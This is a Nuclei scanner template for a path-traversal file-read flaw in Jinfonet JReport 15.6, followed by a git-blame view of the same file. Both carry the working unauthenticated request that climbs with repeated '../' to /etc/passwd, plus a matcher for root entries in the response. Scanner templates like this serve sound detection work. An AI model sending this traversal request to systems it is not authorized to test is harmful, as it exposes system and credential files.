nuclei-templates/http/vulnerabilities/other/jinfornet-jreport-lfi.yaml

id: jinfornet-jreport-lfi

info:
  name: Jinfornet Jreport 15.6 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Jinfornet Jreport 15.6 is vulnerable to local file incluion via the Jreport Help function in the SendFileServlet. Exploitaiton allows remote unauthenticated users to view any files on the Operating System with Application services user permission. This vulnerability affects Windows and Unix operating systems.
  reference:
    - https://cxsecurity.com/issue/WLB-2020030151
    - https://www.jinfonet.com/product/download-jreport/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: jreport,jinfornet,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/08/03
Create jinfornet-jreport-lfi.yaml 2022-01-03 00:27:54 +00:00			`id: jinfornet-jreport-lfi`

			`info:`
Dashboard Content Enhancements (#5009) Dashboard Content Enhancements 2022-08-05 13:57:51 +00:00			`name: Jinfornet Jreport 15.6 - Local File Inclusion`
Create jinfornet-jreport-lfi.yaml 2022-01-03 00:27:54 +00:00			`author: 0x_Akoko`
			`severity: high`
Dashboard Content Enhancements (#5009) Dashboard Content Enhancements 2022-08-05 13:57:51 +00:00			`description: Jinfornet Jreport 15.6 is vulnerable to local file incluion via the Jreport Help function in the SendFileServlet. Exploitaiton allows remote unauthenticated users to view any files on the Operating System with Application services user permission. This vulnerability affects Windows and Unix operating systems.`
Update and rename jinfornet-jreport-lfi.yaml to vulnerabilities/other/jinfornet-jreport-lfi.yaml 2022-01-03 04:31:12 +00:00			`reference:`
			`- https://cxsecurity.com/issue/WLB-2020030151`
			`- https://www.jinfonet.com/product/download-jreport/`
Dashboard Content Enhancements (#5009) Dashboard Content Enhancements 2022-08-05 13:57:51 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 7.5`
			`cwe-id: CWE-22`
Create jinfornet-jreport-lfi.yaml 2022-01-03 00:27:54 +00:00			`tags: jreport,jinfornet,lfi`

Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create jinfornet-jreport-lfi.yaml 2022-01-03 00:27:54 +00:00			`- method: GET`
			`path:`
			`- "{{BaseURL}}/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd"`

			`matchers-condition: and`
			`matchers:`
			`- type: regex`
Update and rename jinfornet-jreport-lfi.yaml to vulnerabilities/other/jinfornet-jreport-lfi.yaml 2022-01-03 04:31:12 +00:00			`part: body`
Create jinfornet-jreport-lfi.yaml 2022-01-03 00:27:54 +00:00			`regex:`
			`- "root:[x*]:0:0"`

			`- type: status`
			`status:`
			`- 200`
Dashboard Content Enhancements (#5009) Dashboard Content Enhancements 2022-08-05 13:57:51 +00:00
			`# Enhanced by mp on 2022/08/03`